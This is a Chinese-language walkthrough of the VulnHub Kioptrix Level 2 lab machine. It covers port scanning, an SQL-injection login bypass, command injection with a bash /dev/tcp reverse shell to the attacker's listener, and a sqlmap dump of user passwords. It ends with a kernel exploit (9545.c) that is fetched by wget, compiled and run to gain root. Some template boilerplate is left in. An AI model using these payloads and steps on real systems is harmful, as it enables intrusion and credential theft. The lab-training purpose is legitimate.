VulnHub-Kioptrix Level 2 简单的命令注入 + 内核提权

总字符数: 12.76K

代码: 6.21K, 文本: 1.04K

预计阅读时间: 32 分钟

Overview

Name	Template
Release Date	2024-02-26
Write-up Author	kill3r
Machine Author	kill3r
Difficulty	Medium
User Flag
Root Flag
Link	https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

薄弱点

字典及信息收集技能薄弱

Nmap扫描

# 使用nmap命令扫描本地主机的所有端口（从1到65535），--min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。
# grep -oE '(^[0-9][^/tcp]*)'用于提取输出结果中的端口号，tr '\n' ','用于将提取的端口号按逗号分隔并拼接成一个字符串
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')

# 使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。
nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt

┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')                                                
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-05 11:31 CST
Nmap scan report for 10.10.10.19
Host is up (0.00026s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            613/udp   status
|_  100024  1            616/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-08-05T00:22:22+00:00; -3h09m22s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
616/tcp  open  status   1 (RPC #100024)
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-title: 403 Forbidden
|_http-server-header: CUPS/1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m22s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds

枚举

SMB 枚举

Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

1	$ enum4linux -A <ip>

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb`

# 用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.101
http://192.168.56.101 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.101], Script[text/javascript]

dirb http://192.168.56.101

dirsearch -u http://192.168.56.101 -r

gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak

┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,js,bak
[+] Timeout:                 10s
===============================================================
2023/08/05 13:37:07 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://10.10.10.9/: Get "http://10.10.10.9/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://10.10.10.19 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.19
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              js,bak,html,php
[+] Timeout:                 10s
===============================================================
2023/08/05 13:37:56 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 284]
/index.php            (Status: 200) [Size: 667]
/manual               (Status: 301) [Size: 311] [--> http://10.10.10.19/manual/]
/usage                (Status: 403) [Size: 284]
/.html                (Status: 403) [Size: 284]
Progress: 1102282 / 1102805 (99.95%)===============================================================
2023/08/05 13:43:45 Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

wordlist

cewl.list:cewl http://192.168.56.101/ -w dict.txt

pass.list

1 2	5afac8d85f 66lajGGbla

user.list

1 2	admin john

hash.list

```

-  information.list

```bash

复现过程

访问靶场,寻找功能点

启动Burp进行后台突破:

SQL注入
万能密码:admin' or '1'='1
访问凭证伪造
弱口令
返回包修改

成功进入后台,但是我的框呢???

Burp抓包把框弄出来

一看就像典型的命令执行输入IP继续抓包

Kali nc监听:nc -lvvp 6666
bash -i >& /dev/tcp/10.10.10.15/6666 0>&1

漏洞分析

MySQL-unauthorized

  ┌──(root㉿kill3r)-[/]
  └─# mysql -uroot -proot -h10.10.10.19
  ERROR 1130 (HY000): Host 'kill3r.lan' is not allowed to connect to this MySQL server

- MySQL-InJect

  ```bash
  ┌──(root㉿kill3r)-[/opt]
  └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 --dbs
  
  available databases [1]:
  [*] webapp
  
  ┌──(root㉿kill3r)-[/opt]
  └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" --tables --risk 3
  Database: webapp
  [1 table]
  +-------+
  | users |
  +-------+
  
  ┌──(root㉿kill3r)-[/opt]
  └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" --columns
  Database: webapp
  Table: users
  [3 columns]
  +----------+-------------+
  | Column   | Type        |
  +----------+-------------+
  | id       | numeric     |
  | password | non-numeric |
  | username | non-numeric |
  +----------+-------------+
  
  ┌──(root㉿kill3r)-[/opt]
  └─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" -C "id,username,password" --dump
  Database: webapp
  Table: users
  [2 entries]
  +----+----------+------------+
  | id | username | password   |
  +----+----------+------------+
  | 1  | admin    | 5afac8d85f |
  | 2  | john     | 66lajGGbla |
  +----+----------+------------+

提升权限

搜索UID无果

bash-3.00$ find / -perm -u=s -type f 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su

Viewing Crontab

bash-3.00$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

Viewing Core

bash-3.00$ cat /etc/*release*
cat: /etc/lsb-release.d: Is a directory
CentOS release 4.5 (Final)

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

┌──(root㉿kill3r)-[/opt]
└─# searchsploit centos 2.6
---------------------------------------------------------------------------- --------------------------------- Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 /  | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / Ce | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esca | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mu | linux_x86-64/local/45516.c
---------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results

bash-3.00$ lsb_release -a
lsb_release -a
LSB Version:    :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final

Vuln Exp

┌──(root㉿kill3r)-[/opt]
└─# searchsploit -m  9545.c
┌──(root㉿kill3r)-[/opt/vulnhub]
└─# python3 -m http.server 8888


bash-3.00$ cd /tmp
bash-3.00$ wget http://10.10.10.15:8888/9545.c
--21:49:13--  http://10.10.10.15:8888/9545.c
           => `25444.c'
Connecting to 10.10.10.15:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]
    0K .........                                             100%    1.25 GB/s
21:51:48 (1.25 GB/s) - `9545.c' saved [9408/9408]

bash-3.00$ gcc 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)